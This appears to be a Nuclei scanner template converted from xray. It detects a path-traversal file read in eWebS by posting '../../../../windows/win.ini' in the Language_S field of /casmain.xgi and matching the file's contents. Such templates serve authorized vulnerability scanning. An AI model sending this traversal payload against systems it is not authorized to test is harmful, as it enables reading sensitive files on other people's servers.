id: poc-yaml-ewebs-fileread

info:
  name: poc-yaml-ewebs-fileread
  author: albertchang(https://github.com/albertchang)
  severity: medium
  tags: xray-converted,ct-416457
  reference:
    - https://www.yuque.com/peiqiwiki/peiqi-poc-wiki/lzqqz4

http:
  - raw:
      - |
        POST /casmain.xgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Language_S=../../../../windows/win.ini

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "for 16-bit app support"